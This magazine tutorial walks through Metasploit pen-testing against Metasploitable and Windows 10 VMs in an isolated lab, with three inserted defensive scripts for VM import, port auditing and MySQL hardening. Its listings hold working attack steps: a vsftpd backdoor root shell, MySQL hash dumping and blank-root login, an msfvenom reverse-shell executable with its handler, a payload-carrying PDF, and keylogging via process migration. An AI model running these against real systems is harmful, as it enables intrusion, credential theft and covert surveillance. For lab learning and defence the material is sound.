Hunt down vulnerabilities with the Metasploit pen-testing tool

Armitage and Meterpreter

To get a quick taste of Metasploit's capabilities, just click on the Armitage entry in the main menu in Parrot or Kali Linux. Tutorials Point [7] and Offensive Security [8] offer good beginner tutorials for point-and-click forensics (as a friend who is a trainer for the German police force calls them).

Armitage enjoys a good reputation among red teams, thanks to its collaboration mode, which the developers themselves refer to as multiplayer Metasploit or red team collaboration mode. Armitage (Figure 5) can also perform simple Nmap host scans from its main menu, but the true strength of the tool only becomes apparent when several users work together on a compromised host in a Meterpreter shell.

Figure 5: Armitage is the GUI front end of choice for red teams and anyone looking for a graphical approach to Metasploit.

Meterpreter [9] is probably the most appealing payload an attacker can install on a remote computer. It can be easily hidden in other file formats (e.g., PDFs), sent as an email attachment, or embedded in websites. All it takes is for the victim to open a prepared website, email, or corresponding document, and the attacker gains control of the computer.

In this case, Meterpreter as the payload opens a reverse shell; ransomware at the same point would encrypt the computer and open a backdoor. A hijacked Windows 10 machine, for example, now gives the attacker command-line access, perhaps even as the admin user. Long before PowerShell, the police trainer I referred to above cited Meterpreter as the better shell for the Windows admin – not only because of its extensive command set, but also because of numerous helpful extensions like Mimikatz [10], which played a central role in the 2015 attack on the German Bundestag [11], helping to spy on the Active Directory domain and gain domain admin rights.

In the process, Meterpreter resides completely in the hijacked machine's RAM. Thanks to in-memory dynamic link library (DLL) injection, it does not write anything to the hard drive, does not create any new processes, and therefore ideally does not leave any permanent traces. Forensic experts speak of a very small forensic footprint, although the payload can migrate into other running processes.

Meterpreter is extremely flexible, as well, which should come as no surprise, because it was designed to avoid the tricky decisions involved in choosing a suitable payload. Thanks to Meterpreter, you can do this later in the process from a remote shell without triggering alarms from virus scanners or similar tools.

From the command line, two basic connection methods are available: bind and reverse. With bind, Meterpreter listens on a port on the victim until the attacker connects. With reverse, the victim computer itself connects back to the attacker's control server, whose listener must be configured accordingly for the connection to work. Both approaches are useful in different scenarios.

All of the above can best be tested with Metasploitable. Version 2 of the image is now available with many additional security holes [12]. A complete list of all the vulnerabilities is beyond the scope of any article, but it is worth taking a look at the Exploitability Guide [13].

The image offered for download is not an installer; it is built for direct use in virtualized environments. It comes in the VMware VMDK format with separate configuration files. To use it in Libvirt/KVM, you have to download it from the Rapid7 website (this takes a bit of time because Rapid7 requires you to register) and then unpack and convert it [14]. A script then lets you edit the configuration file and create a new virtual machine with virsh in Libvirt. Although it sounds complicated, it can be done with just three commands:

$ qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2 Metasploitable.qcow2
$ wget https://bazaar.launchpad.net/~ubuntu-virt/virt-goodies/trunk/download/head:/vmware2libvirt
$ python vmware2libvirt -f Metasploitable.vmx > Metasploitable.xml

The Ubuntu script worked without any problems on a laptop running openSUSE Tumbleweed in our lab. The command

zypper in virt-manager libvirtd

installs both the server service and the front end, but I was unable to convert the image with virt-v2v in the test; hence, the Ubuntu script in the wget command.

By default, the Metasploitable image uses the Libvirt default network, which is set to NAT, thus isolating the machines in the test scenario from the rest of the network. Don't forget: libvirtd only runs if systemd starts it, preferably permanently. The commands

systemctl enable libvirtd
systemctl status libvirtd
service libvirtd start

mark libvirtd to start at boot, check its status, and start it right away. The next step is to import the image:

virsh -c qemu:///system define Metasploitable.xml

The virtual machine manager (virt-manager) will come up with a fully configured, bootable Metasploitable instance. It makes sense to ensure that the system automatically boots this instance and the associated network when booting or starting virt-manager.
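The conversion and import steps above, combined into one script. This is an added example and not part of the article. It assumes that Metasploitable.vmdk and Metasploitable.vmx sit in the current directory, that the vmware2libvirt script from the wget command has been downloaded next to them, and that the XML vmware2libvirt writes contains a <disk type='file' device='disk'> element whose <source file=...> still names the VMware disk (an assumption); the fix_disk_xml function rewrites that element to the qcow2 image and sets the qcow2 driver, which is the manual edit of the configuration file the article refers to. The domain name is read back from the generated XML rather than guessed.

```shell
#!/bin/sh
# Added example (not from the article): convert the Metasploitable VMware
# image and register it with libvirt/KVM in one go.
# Assumes Metasploitable.vmdk, Metasploitable.vmx and the vmware2libvirt
# script are in the current directory.
set -eu

# Metasploitable.vmdk -> Metasploitable.qcow2
qcow2_name() {
    printf '%s.qcow2\n' "${1%.vmdk}"
}

# Rewrite the first disk in the libvirt XML on stdin so that it points at the
# converted image ($1, absolute path) and declares the qcow2 driver. Assumption:
# vmware2libvirt emits <disk type='file' device='disk'> with a <source file=...>
# naming the original .vmdk and, possibly, a <driver .../> line of another type.
fix_disk_xml() {
    awk -v img="$1" -v drv="      <driver name='qemu' type='qcow2'/>" '
        /<disk type=.file. device=.disk.>/ { in_disk = 1; seen_driver = 0 }
        in_disk && /<driver / {
            # keep an existing driver line, just force type=qcow2
            if (!sub(/type=\047[^\047]*\047/, "type=\047qcow2\047")) sub(/\/>/, " type=\047qcow2\047/>")
            seen_driver = 1
        }
        in_disk && /<source file=/ { sub(/file=\047[^\047]*\047/, "file=\047" img "\047") }
        in_disk && /<\/disk>/ { if (!seen_driver) print drv; in_disk = 0 }
        { print }
    '
}

# The article's three commands plus the libvirt steps, in order.
import_metasploitable() {
    vmdk=$1
    vmx=$2
    qcow2=$(qcow2_name "$vmdk")
    qemu-img convert -f vmdk "$vmdk" -O qcow2 "$qcow2"
    python vmware2libvirt -f "$vmx" | fix_disk_xml "$(pwd)/$qcow2" > Metasploitable.xml
    name=$(sed -n 's|.*<name>\(.*\)</name>.*|\1|p' Metasploitable.xml | head -n 1)
    systemctl enable --now libvirtd
    virsh -c qemu:///system define Metasploitable.xml
    # The article recommends that the VM and its NAT network come up automatically.
    virsh -c qemu:///system net-autostart default
    virsh -c qemu:///system autostart "$name"
    echo "defined domain $name from $qcow2"
}

# Set RUN_IMPORT=1 for the real import; otherwise only demonstrate the XML
# fixup on a constructed fragment.
if [ "${RUN_IMPORT:-0}" = 1 ]; then
    import_metasploitable Metasploitable.vmdk Metasploitable.vmx
else
    printf '%s\n' "<disk type='file' device='disk'>" \
        "  <source file='/vm/Metasploitable.vmdk'/>" \
        "  <target dev='hda' bus='ide'/>" \
        "</disk>" | fix_disk_xml /vm/Metasploitable.qcow2
fi
```

Without the driver line, libvirt would treat the converted file as a raw image and the guest would not boot, which is the usual reason the freshly defined domain fails after an otherwise successful conversion.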

Now install Windows 10 on another virtual machine and do the same for Kali Linux and Parrot Linux (although the two Live distributions also work wonderfully without the install). For performance reasons, I decided to install both distributions on virtual disks.

After completing this preliminary work, start the test with ssh-copy-id to transfer your own SSH key to the three Linux machines; an alias for each Linux makes life easier from now on. For Metasploitable, the username and password are msfadmin. Kali usually does not have a root account (if it does, the password is toor; otherwise, you can configure it during the installation), but it does have a kali user with kali as the password. Parrot Linux also uses toor as the root password but largely disables the account.

The command

ssh-copy-id msfadmin@192.168.122.<nnn>

copies your public key to the virtual Metasploitable machine on IP address 192.168.122.nnn. Three aliases in ~/.alias make life easier (Listing 1), and don't forget to source the file after editing. Entries in the hosts file or in DNS help, too.

Listing 1

Practical Aliases

alias metasploitable='ssh msfadmin@192.168.122.236'
alias kali='ssh kali@192.168.122.192'
alias parrot='ssh parrot@192.168.122.56'

At last, nothing stands in the way of an initial test of Metasploitable. Thanks to an intentionally backdoored FTP service, reached here with telnet, a backdoor opens up for the Parrot user (Listing 2). The example impressively shows the importance of signed software packages from reliable sources. Here, an attacker has obviously made sure that the FTP service on port 21 opens a backdoor with admin rights on port 6200 if – would you believe it? – the username of the vsftpd login contains a smiley (user mfeilner:)). The second telnet command in the example then allows login-free access to a kind of root shell.

Listing 2

Telnet Backdoor

Parrot GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Sun Jul 25 20:12:28 2021 from 192.168.122.1
[mfeilner@parrot][~]
$ telnet 192.168.122.236 21
Trying 192.168.122.236...
Connected to 192.168.122.236.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user mfeilner:)
331 Please specify the password.
<pass>
^]
telnet> quit
Connection closed.
[mfeilner@parrot][~]
$ telnet 192.168.122.236 6200
Trying 192.168.122.236...
Connected to 192.168.122.236.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
cat /etc/passwd;
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
(...)
reboot;
Connection closed by foreign host.

Metasploitable runs many more insecure services that an Nmap scan brings to light (Listing 3), and because the nmap command also finds a MySQL database on Metasploitable, the next example shows how an attacker could easily hijack the database management system – thanks to a missing root password. Listing 4 shows the entire command sequence and the return output from Parrot, MSF, and Metasploitable. The msfconsole command launches the Metasploit framework's interactive shell. Listing 5 shows the verification by a MySQL command, including the retrieval of user data from /etc/passwd.

Listing 3

Nmap Scan

[root@parrot][/]
# nmap -p0-65535 metasploitable
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 22:05 CEST
Nmap scan report for metasploitable (192.168.122.236)
Host is up (0.095s latency).
Not shown: 65506 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  ircs-u
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  msgsrvr
45901/tcp open  unknown
46758/tcp open  unknown
58453/tcp open  unknown
60132/tcp open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.35 seconds
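The defensive counterpart to the scan in Listing 3: compare the services Nmap reports against a baseline of what a host is supposed to expose and flag everything else, with a note on why the legacy services matter. This is an added example, not from the article; the scan text is an excerpt copied from Listing 3, the baseline (SSH and HTTP only) and the service notes are constructed here. A later scan showing a port outside the baseline, such as the 6200/tcp backdoor from Listing 2, would be flagged the same way.

```shell
#!/bin/sh
# Added example (not from the article): diff an Nmap service list against a
# baseline of the listeners a host is supposed to expose and flag the rest.
set -eu

# Constructed input: an excerpt of the article's Listing 3 and a baseline
# allowing only SSH and HTTP on this host.
SCAN='PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
80/tcp    open  http
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
3306/tcp  open  mysql
5900/tcp  open  vnc
MAC Address: 00:0C:29:FA:DD:2A (VMware)'
BASELINE='22/tcp 80/tcp'

# Why a listener matters, keyed by Nmap service name; anything unknown is "review".
legacy_note() {
    case $1 in
        ftp|telnet|exec|login|shell) echo "cleartext credentials" ;;
        vnc|X11)                     echo "remote display, usually without TLS" ;;
        mysql|postgresql)            echo "database reachable from the network" ;;
        nfs|rpcbind)                 echo "exported file system / RPC" ;;
        *)                           echo "review" ;;
    esac
}

# Print "port service (note)" for every open port missing from the baseline.
# $1 = Nmap normal output, $2 = space-separated list of allowed port/proto pairs
unexpected_ports() {
    printf '%s\n' "$1" | awk -v base="$2" '
        BEGIN { n = split(base, b, " "); for (i = 1; i <= n; i++) allowed[b[i]] = 1 }
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" && !($1 in allowed) { print $1, $3 }
    ' | while read -r port svc; do
        printf '%s %s (%s)\n' "$port" "$svc" "$(legacy_note "$svc")"
    done
}

unexpected_ports "$SCAN" "$BASELINE"
```

Run against the excerpt, the function reports seven listeners, from 21/tcp ftp down to 5900/tcp vnc, and stays silent for a host whose baseline covers everything it exposes. The baseline is the useful part: keep one per host role under version control and run the comparison after every scan, so that a new listener stands out even when its service name is "unknown".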

Listing 4

Hijacking the MySQL Database

[root@parrot][/]
# msfconsole
(...)
msf6 > use auxiliary/scanner/mysql/mysql_version
msf6 auxiliary(scanner/mysql/mysql_version) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(scanner/mysql/mysql_version) > run
[+] 192.168.122.236:3306  - 192.168.122.236:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] metasploitable:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_version) > use auxiliary/admin/mysql/mysql_enum
msf6 auxiliary(admin/mysql/mysql_enum) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.122.236
[-] 192.168.122.236:3306 - Access denied
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
USERNAME => root
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.122.236
[*] 192.168.122.236:3306 - Running MySQL Enumerator...
[*] 192.168.122.236:3306 - Enumerating Parameters
[*] 192.168.122.236:3306 -      MySQL Version: 5.0.51a-3ubuntu5
(...)
[*] 192.168.122.236:3306 - Enumerating Accounts:
[*] 192.168.122.236:3306 -      List of Accounts with Password Hashes:
[+] 192.168.122.236:3306 -              User: debian-sys-maint Host:  Password Hash:
[+] 192.168.122.236:3306 -              User: root Host: % Password Hash:
[+] 192.168.122.236:3306 -              User: guest Host: % Password Hash:
[*] 192.168.122.236:3306 -      The following users have GRANT Privilege:
[*] 192.168.122.236:3306 -              User: debian-sys-maint Host:
[*] 192.168.122.236:3306 -              User: root Host: %
[*] 192.168.122.236:3306 -              User: guest Host: %
[*] 192.168.122.236:3306 -      The following users have CREATE USER Privilege:
(...)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_enum) > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run
[+] 192.168.122.236:3306  - Saving HashString as Loot: debian-sys-maint:
[+] 192.168.122.236:3306  - Saving HashString as Loot: root:
[+] 192.168.122.236:3306  - Saving HashString as Loot: guest:
[*] metasploitable:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 > use /auxiliary/scanner/mysql/mysql_login
[*] Using auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > use /auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.122.236:3306  - 192.168.122.236:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.122.236:3306  - No active DB -- Credential data will not be saved!
[+] 192.168.122.236:3306  - 192.168.122.236:3306 - Success: 'root:'
[*] metasploitable:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Listing 5

Verification with a MySQL Command

(mfeilner@kali)-[~]
$ mysql -h metasploitable -u root
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 15
(...)
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.001 sec)
MySQL [(none)]> select load_file('/etc/passwd');
+---------------------------------------------(...)+
| load_file('/etc/passwd')                   (...)|
+---------------------------------------------(...)+
| root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
(...)
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
(...)
+---------------------------------------------(...)+
1 row in set (0.001 sec)

As you can see at the end of Listing 4, Metasploit does not yet use a database for the captured data here, so it does not leave any traces either. If you do use a database (PostgreSQL by default), you can draw on a few more helpful functions. The command

service postgresql start

starts PostgreSQL, so next you need to initialize it for Metasploit (Listing 6). The db_nmap command then populates the database with hosts.

Listing 6

Initializing Database for Metasploit

(root@kali)-[/home/mfeilner]
# msfdb init
[+] Starting database
[+] Creating database user 'msf'
Enter the password of the new role:
Enter it again:
[+] Creating databases 'msf'
(...)
[+] Creating databases 'msf_test'
(...)
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
(root@kali)-[/home/mfeilner]
msf6 > help database
Database Backend Commands
=========================
    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific
(...)
    db_nmap           Executes nmap and records the output
(...)
msf6 >  db_nmap -v -sV 192.168.122.0/24
(...)
[*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 66.64 seconds
msf6 > hosts
Hosts
=====
address          mac  name            os_name  os_flavor  os_sp  purpose  info  comments
-------          ---  ----            -------  ---------  -----  -------  ----  --------
192.168.122.1                         Unknown                    device
192.168.122.56        parrot          Unknown                    device
192.168.122.192       kali            Unknown                    device
192.168.122.236       metasploitable  Linux                      server

As Listing 7 shows, Metasploit now automatically runs the mysql_login scan against all hosts in the database and again finds the vulnerable root account without a password. For all other cases, Metasploit ships word lists for a password attack in /usr/share/metasploit-framework/data/wordlists. You apply one of them by typing:

set PASS_FILE /usr/share/metasploit-framework/data/wordlists/<list>

Listing 7

MySQL Scan with Database

msf6 > use /auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > run
[-] 192.168.122.1:3306    - 192.168.122.1:3306 - Unable to connect: The connection was refused by the remote host (192.168.122.1:3306).
[*] Scanned 1 of 5 hosts (20% complete)
(...)
[*] Scanned 4 of 5 hosts (80% complete)
[+] 192.168.122.236:3306  - 192.168.122.236:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.122.236:3306  - 192.168.122.236:3306 - Success: 'root:'
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_login) > creds
Credentials
===========
host             origin           service           public  private  realm  private_type    JtR Format
----             ------           -------           ------  -------  -----
192.168.122.236  192.168.122.236  3306/tcp (mysql)  root                   Blank password

In Listing 7, creds shows all available, automatically acquired login data.
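Seen from the database side, the findings of Listings 4 and 7 come down to two account properties: an empty password and a host wildcard. The following audit, an added example that is not part of the article, reads a dump in the shape of mysql -N -B -e "SELECT user, host, password FROM mysql.user" (MySQL 5.0 column name; newer servers call it authentication_string), reports every account with either weakness, and prints the matching MySQL 5.0 remediation statements. The dump, the <new-password> placeholder and the hash value are constructed; the first three rows mirror Listing 4.

```shell
#!/bin/sh
# Added example (not from the article): audit MySQL accounts for the two
# weaknesses the scan found on Metasploitable, a blank password and a host
# wildcard, and print the matching remediation statements.
set -eu

# Constructed dump in the shape of
#   mysql -N -B -e "SELECT user, host, password FROM mysql.user"
# on MySQL 5.0 (newer servers call the column authentication_string).
# The first three rows mirror the article's Listing 4; the hash is a placeholder.
USER_DUMP=$(printf '%s\t%s\t%s\n' \
    debian-sys-maint localhost '' \
    root '%' '' \
    guest '%' '' \
    msfadmin localhost '*PLACEHOLDERHASH')

# One line per weak account: "user@host: finding[, finding]"
audit_mysql_users() {
    printf '%s\n' "$1" | awk -F '\t' '
        {
            issues = ""
            if ($3 == "") issues = "blank password"
            if ($2 == "%") issues = issues (issues == "" ? "" : ", ") "any host"
            if (issues != "") print $1 "@" $2 ": " issues
        }'
}

# SQL to fix each finding in the 5.0 syntax of the target (assumption: on 5.7+
# the form is ALTER USER ... IDENTIFIED BY). Statements are meant to run in the
# printed order; <new-password> is a placeholder to replace.
remediation_sql() {
    printf '%s\n' "$1" | awk -F '\t' -v q="'" '
        $3 == ""  { printf "SET PASSWORD FOR %s@%s = PASSWORD(%s);\n", q $1 q, q $2 q, q "<new-password>" q }
        $2 == "%" { printf "RENAME USER %s@%s TO %s@%s;\n", q $1 q, q $2 q, q $1 q, q "localhost" q }
    '
}

audit_mysql_users "$USER_DUMP"
remediation_sql "$USER_DUMP"
```

The audit flags debian-sys-maint, root and guest but not msfadmin, and the remediation emits five statements: a SET PASSWORD for each blank account and a RENAME USER to localhost for the two wildcard accounts. The load_file() call in Listing 5 additionally needs the FILE privilege, which this audit does not look at; revoking it from accounts that do not need it closes that route as well.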

Even though the multistage Metasploit workflow is now clearer, the examples only outline the possibilities the framework offers. Even a plain search login in msfconsole returns 248 exploits that could be used to log on to your systems. For example,

use auxiliary/scanner/smb/smb_login

helps you find out whether a Samba/Windows/Active Directory login also works for other services or servers.

If all of this is not enough, an attacker can use extensions like Autopwn (Listing 8) to make it even easier to hijack third-party machines in an automated process. The plugin was removed from Metasploit's standard distribution some years ago.

Listing 8

Retroactive Autopwn Install

# cd /usr/share/metasploit-framework/plugins
# wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
# msfconsole
msf6 > load db_autopwn
[*] Successfully loaded plugin: db_autopwn

Windows 10 and More

Listing 9 does not use Metasploitable; instead, it shows an attack on the Windows 10 instance. The latest versions of Microsoft's operating system already come with a considerable number of protection mechanisms; in this article, I avoid describing workarounds or sources for downloading the exploit.

Listing 9

Remote Shell on Windows 10

(mfeilner@kali)-[~]
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.192 -f exe -o /tmp/backdoor.exe
(mfeilner@kali)-[~]
$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 192.168.122.192
LHOST => 192.168.122.192
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.122.192:4444
[*] Sending stage (175174 bytes) to 192.168.122.43
[*] Meterpreter session 1 opened (192.168.122.192:4444 -> 192.168.122.43:57816) at 2021-07-26 01:49:31 +0200
meterpreter > execute -f cmd.exe -i -H
Process 6500 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.1110]
(c) Microsoft Corporation. All rights reserved.
C:\Users\mfeilner\Desktop>

In this example, msfvenom [15] creates an EXE file that contains a Meterpreter backdoor. With social engineering, the attacker can get the Windows user to throw all warnings (Figure 6) to the wind and execute the file. If this works, the attack can be configured and started with a few Metasploit commands. At the end of the day, the attacker has a remote administrator shell on Windows 10.

Figure 6: Without any obfuscation, the standard antivirus protection on Windows 10 already recognizes the Meterpreter payload as a Trojan, but this could easily be worked around.

This method also works with a PDF file, as Listing 10 shows. However, it requires an existing PDF document to carry the payload. In the example, simply viewing the PDF document on the victim's computer opens a remote shell for the attacker, who could then start a keylogger (keyscan_start); keyscan_dump returns the captured keystrokes.

Listing 10

An Infected PDF

(mfeilner@kali)-[~]
$ msfconsole
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe
(...)
msf6 > set EXENAME reverse.exe
(...)
msf6 > set FILENAME tibet.pdf
(...)
msf6 > set INFILENAME /tmp/test.pdf
(...)
msf6 > set OUTPUTPATH /tmp
(...)
msf6 > set PAYLOAD windows/meterpreter/bind_tcp

Another danger arises when the attacker picks one process [16] and switches the session to another process used by the admin with migrate <PID>; the PID can be retrieved with tools like ps in the remote shell. The keylogger then outputs the keystrokes received by that process – the winlogon.exe process is worth looking at, for example.

Windows 10 or PDF viewers are by no means the only targets: The news on the Meterpreter homepage turns out to be a real treasure trove for Apple hackers [17], and an Infosec [18] blog post describes how easy it is to hijack an Android device with an infected APK package. Again, this just involves five steps, thanks to Metasploit.

Infos

  1. Metasploit Framework: https://docs.rapid7.com/metasploit/msf-overview/
  2. "Pen testing and PDF manipulation with Metasploit" by Hans-Peter Merkel and Markus Feilner, Linux Magazine, issue 121, December 2010, p. 18
  3. "Hacker trainer for law enforcement agents" by Markus Feilner, Linux Magazine, issue 102, May 2009, p. 92, https://www.linux-magazine.com/Issues/2009/102/Forensics-in-Freiburg
  4. "The sys admin's daily grind – Metasploitable" by Charly Kühnast, Linux Magazine, issue 172, March 2015, p. 66, https://www.linux-magazine.com/Issues/2015/172/Charly-s-Column-Metasploitable
  5. "Metasploit Wrap-Up" by Dean Welch, Rapid7 blog: https://www.rapid7.com/blog/post/2021/10/22/metasploit-wrap-up-135/
  6. "Contributing to Metasploit": https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md
  7. Tutorials Point: https://www.tutorialspoint.com/metasploit/metasploit_armitage_gui.htm
  8. Offensive Security: https://www.offensive-security.com/metasploit-unleashed/armitage/
  9. Meterpreter: https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
  10. Mimikatz: https://www.offensive-security.com/metasploit-unleashed/mimikatz/
  11. German Parliament hacked: https://it-akten.de/digital-attack-on-german-parliament/
  12. Metasploitable: https://information.rapid7.com/download-metasploitable-2017.html
  13. Exploitability guide: https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
  14. Image conversion: https://linux-hacking-guide.blogspot.com/2015/05/convert-vmware-virtual-machine-to-kvm.html
  15. msfvenom: https://www.hackingarticles.in/msfvenom-tutorials-beginners/
  16. Keyloggers: https://www.offensive-security.com/metasploit-unleashed/keylogging/
  17. Meterpreter and Apple: https://meterpreter.org/category/apple/
  18. Hijacking Android: https://resources.infosecinstitute.com/topic/lab-hacking-an-android-device-with-msfvenom/

The Author

Markus Feilner, technology and network policy editor at Mailbox.org, has been working with Linux since 1994. He was deputy editor-in-chief of Linux-Magazin and iX, as well as the Docu Team Lead at Suse. For 21 years, he has managed Feilner IT, which specializes in documentation, digital sovereignty, and OSI layers 8 to 10.
